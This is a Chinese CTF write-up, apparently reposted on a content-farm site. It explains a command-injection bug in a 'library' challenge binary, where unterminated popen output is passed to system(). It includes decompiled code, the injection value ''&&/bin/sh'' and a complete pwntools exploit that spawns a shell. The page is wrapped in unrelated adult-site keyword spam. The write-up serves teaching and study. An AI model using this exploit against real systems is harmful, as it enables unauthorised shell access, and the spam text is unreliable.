亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > C++ > 正文

關于讀取popen輸出結果時未截斷字符串導致的命令行注入詳解

2020-05-23 13:33:51
字體:
來源:轉載
供稿:網友

0x00 前言

這種命令行注入在pwn中出現的比較少,所以記錄分享一下。

0x01 命令行注入介紹

熟悉web安全的話就知道,如果對特殊字符過濾不當,會引發sql注入或者xss等安全漏洞。其中,命令行注入較為嚴重,因為可以直接拿到漏洞程序當前權限的OSshell。

然而,命令行注入不僅在web中會出現,在C語言程序中,也會出現命令行注入的漏洞。比方說這道pwn題,就是調用system時,沒有對輸入數據進行/0截斷以及對特殊字符處理不當而導致的。

命令行注入相對于其他二進制漏洞相比利用比較簡單,比方說這道題,舉個例子:

sprintf(&s, "du -sh lib/'%s'", v6);system(&s);

其中設計初衷,v6應當是一個合法的文件名。但是如果攻擊者惡意操控v6,比方說,讓v6為:'&&/bin/sh'
進行sprintf拼接后,system所執行的命令為:

du -sh lib/''&&/bin/sh''

這里有兩個linux命令行的知識:

&&,這是拼接兩個命令,如果我們執行 command1&&command2,那么等價于先執行command1在執行command2。其中命令跟&&之間不必加空格。

在命令后不加空格的''(兩個單引號)會被忽略,比如ls''等價于ls,/bin/sh''等價于/bin/sh,du -sh lib/''等價于du -sh lib/(即,實際傳進去的參數是lib/不是lib/'')

所以,執行上面的命令,相當于先執行了

du -sh lib/

再執行

/bin/sh

所以,可以getshell。

0x02 題目

題目所給的是一個library的服務,可以上傳book,查看books,清除books。其中,book存放在lib/文件夾中。

0x03 漏洞點

char *list_books(){ FILE *v0; // eax char *result; // eax char s; // [esp+4h] [ebp-C14h] char ptr; // [esp+804h] [ebp-414h] char *v4; // [esp+C04h] [ebp-14h] FILE *stream; // [esp+C08h] [ebp-10h] char *v6; // [esp+C0Ch] [ebp-Ch] v0 = popen("ls lib/", "r"); stream = v0; result = (char *)fread(&ptr, 1u, 0x400u, v0); v4 = result; if ( result ) { v6 = strtok(&ptr, delims); result = (char *)send("Book list:/nSize/tE-book/n"); while ( v6 ) { sprintf(&s, "du -sh lib/'%s'", v6); //很明顯,這里存在可能的命令行注入 system(&s); fflush(stdout); result = strtok(0, delims); v6 = result; } } return result;

其中list_books代碼如上,v6來自fread從popen中的返回結果。他本來想做的是輸出每個文件的大小,但是fread后沒有用/0截斷。所以調用strtok時,可能會讀到fread后面的垃圾數據(當然如果可以操控的話就不是垃圾數據了)

sprintf的棧溢出會比較難利用,因為&s比較大,有0x800,而v6是從&ptr里面strtok出來的,而&ptr更小,只有0x400。所以應該沒法很好的利用。

0x04 操控垃圾數據

那么,我們怎么去操控&ptr中的垃圾數據呢?這個時候看看另外一個函數

int upload_book(){ char *v1; // eax int v2; // eax char buf[1024]; // [esp+Ch] [ebp-42Ch] char s[20]; // [esp+40Ch] [ebp-2Ch] FILE *stream; // [esp+420h] [ebp-18h] char *dest; // [esp+424h] [ebp-14h] size_t v7; // [esp+428h] [ebp-10h] int v8; // [esp+42Ch] [ebp-Ch] if ( book_counter > 10 ) return send("too many books/n"); send("Book filename: "); v8 = __isoc99_scanf("%20s", s); if ( v8 != 1 ) return send("Wrong title format/n"); v7 = strlen(s); if ( strcmp(&s[v7 - 3], ".bk") ) return send("The name needs to end with '.bk'/n"); send("e-book contents: /n"); read(0, buf, 0x400u); if ( *(_DWORD *)buf != 'BBBB' ) return send("Not an e-book/naborting.../n"); v1 = (char *)malloc(0x18u); dest = v1; *(_DWORD *)v1 = 0x2F62696C; v1[4] = 0; strcat(dest, s); stream = fopen(dest, "w"); if ( !stream ) return send("Bad book filename/n"); v2 = book_counter++; books[v2] = dest; fwrite(buf, 1u, 0x400u, stream); return fclose(stream);}

其中,這在棧中也會分配0x400個字節,并且我們可以寫入。

并且,調用完這個函數之后,清除??臻g時,只是簡單地add esp,xxx,并不會清空其中數據。然后,再調用存在命令行注入的函數并分配??臻g時,也只是單純地sub esp,xxx,也不會清空數據。在C語言中,如果此時對不賦值的局部變量直接訪問的話,是UB行為。但是,從二進制安全的角度看的話,便是可利用的點了。其中這道題,本身就是一個局部字符串讀取后未截斷而造成的UB,然而我們便可以利用這個。

那么來試試:

c,字符串截斷,c語言,popen,輸出

很明顯,BBBB123456789123456789123456789123456789AAAA的后面89123456789AAAA被拼接到du -sh lib/'%s'中了

動態調試看一下的話

第一次在system停下

c,字符串截斷,c語言,popen,輸出

第二次在system停下

c,字符串截斷,c語言,popen,輸出

所以很明顯,只要把89123456789AAAA改成

'&&/bin/sh'/x00

就可以getshell了。如前面所說。

其中,/x00是我們自己手動截斷,不然strtok還會繼續往后讀。

所以最后exp

#BBBB1234567891234567891234567'&&/bin/sh'g_local = True from pwn import * if g_local: sh=process("./library")else: sh=remote("xxxx",1234)  def upload_book(filename, content): filename += ".bk" sh.send("1/n") sh.recvuntil("Book filename: ") print filename sh.send(filename + "/n") sh.recvuntil("e-book contents: /n") sh.send(content) sh.recvuntil("Enter command: ") def list_books_and_shell(): sh.send("2/n") sh.interactive() upload_book("1", "BBBB1234567891234567891234567/'&&/bin/sh/'/x00")list_books_and_shell()

0x05 后言

還有一點要注意,pwndbg好像會默認在fork時跟子進程,所以要在~/.gdbinit的最后面(加載pwndbg之后)加上set follow-fork-mode parent。并且,&&與命令之間不能加空格。因為他strtok是通過空格和換行分斷字符串的,加了空格我們的payload就會被strtok分割開。

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對VEVB武林網的支持。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
国产女同一区二区| 亚洲精品成a人在线观看| 91精品国产高清久久久久久91| 91成品人片a无限观看| 精品国产乱码久久久久久虫虫漫画| 亚洲最大福利网站| 91av在线播放| 亚洲成人免费网站| 91网站在线看| 中文字幕日韩av电影| 国产精品久久久久久久av电影| 亚洲精品之草原avav久久| 国产精品自拍小视频| 亚洲一级免费视频| 日韩精品一区二区三区第95| 国产女同一区二区| 在线观看久久久久久| 欧美激情视频给我| 国产精品午夜一区二区欲梦| 国产精品吹潮在线观看| 亚洲国产欧美一区二区三区久久| 国产成人精品综合久久久| 欧美成人免费观看| 97精品国产97久久久久久免费| 青青在线视频一区二区三区| 成人网址在线观看| 97在线观看免费高清| 日韩精品久久久久| 91黑丝高跟在线| 亚洲精品中文字| 久久精品电影一区二区| 北条麻妃一区二区在线观看| 欧美一区第一页| 欧美日韩国产一中文字不卡| 久久久久久久成人| 中文字幕精品一区二区精品| 久久久久久国产精品美女| 国产成人在线视频| 亚洲最大的网站| 91久久精品国产91久久| 亚洲www永久成人夜色| 日本最新高清不卡中文字幕| 欧美大片在线看| 国产精品久久久久久婷婷天堂| 色伦专区97中文字幕| 亚洲欧洲国产伦综合| 成人情趣片在线观看免费| 国产精品海角社区在线观看| 亚洲激情电影中文字幕| 亚州成人av在线| 久久97精品久久久久久久不卡| 国产精品丝袜久久久久久高清| 亚洲精品色婷婷福利天堂| 色播久久人人爽人人爽人人片视av| 欧美高清视频在线播放| 久久久噜噜噜久久久| 精品精品国产国产自在线| 中文字幕一区二区三区电影| 在线电影中文日韩| 欧美在线影院在线视频| 国产主播在线一区| 精品久久久999| 最近2019年手机中文字幕| 亚洲加勒比久久88色综合| 国产欧美日韩91| 韩国v欧美v日本v亚洲| 欧美老女人性视频| 成人网中文字幕| 久久久在线观看| 亚洲一区二区三区成人在线视频精品| 欧美日韩国产综合视频在线观看中文| 92版电视剧仙鹤神针在线观看| 日韩中文av在线| 欧美日韩激情视频8区| 81精品国产乱码久久久久久| 久久精品国产亚洲一区二区| 国产精品免费久久久久影院| 国产成人久久久精品一区| 成人激情免费在线| 国产日韩在线观看av| 欧美一区三区三区高中清蜜桃| 欧美极品少妇xxxxⅹ免费视频| 92福利视频午夜1000合集在线观看| 国产精品高清网站| 2018日韩中文字幕| 成人免费视频97| 久久深夜福利免费观看| 国产精品丝袜白浆摸在线| 亚洲欧美精品中文字幕在线| 成人乱人伦精品视频在线观看| 久久亚洲综合国产精品99麻豆精品福利| 国产丝袜精品第一页| 亚洲综合大片69999| 久久精品久久久久久| 欧美中文在线观看| 国模精品系列视频| 亚洲美女视频网| 久热爱精品视频线路一| 中日韩午夜理伦电影免费| 中文字幕精品—区二区| 欧美乱大交xxxxx另类电影| 成人免费网站在线看| 亚洲男人av电影| 日韩精品在线私人| 92国产精品久久久久首页| 97免费视频在线播放| 国产精品精品一区二区三区午夜版| 日韩小视频在线观看| 欧美性色xo影院| 国产精品视频免费观看www| 中文字幕亚洲二区| 5278欧美一区二区三区| 欧洲成人免费视频| 国产成人激情小视频| 欧美性受xxx| 国产精品麻豆va在线播放| 久久精品国产免费观看| 色yeye香蕉凹凸一区二区av| 欧美精品国产精品日韩精品| 亚洲日韩欧美视频一区| 97色在线播放视频| 久久激情视频久久| 国产午夜精品一区理论片飘花| 精品毛片网大全| 亚洲bt欧美bt日本bt| 国内精品视频一区| 日韩美女视频免费看| 久久久国产在线视频| 欧美视频二区36p| 夜夜嗨av一区二区三区四区| 一区二区三区黄色| 成人乱人伦精品视频在线观看| 国产精品美女免费视频| 91产国在线观看动作片喷水| 91禁外国网站| 国产精品黄视频| 国产精品成人一区二区| 久久天天躁狠狠躁夜夜躁2014| 羞羞色国产精品| 欧美成aaa人片在线观看蜜臀| 人人爽久久涩噜噜噜网站| 亚洲国产福利在线| 国产日韩欧美在线| 亚洲中国色老太| 日韩男女性生活视频| 国产成人综合一区二区三区| 久久久精品免费视频| 97视频在线观看免费高清完整版在线观看| 久久久久九九九九| 国产日产欧美a一级在线| 精品小视频在线| 国产精品国产亚洲伊人久久| 亚洲网在线观看| 国产精品久久久久久久一区探花| 欧美午夜电影在线| 欧美日韩电影在线观看| 久久久精品久久久| 亚洲自拍偷拍网址| 久久99热这里只有精品国产| 亚洲精品v欧美精品v日韩精品| 国产成人精品在线观看| 色与欲影视天天看综合网| 亚洲香蕉av在线一区二区三区| 欧美激情一区二区三区成人|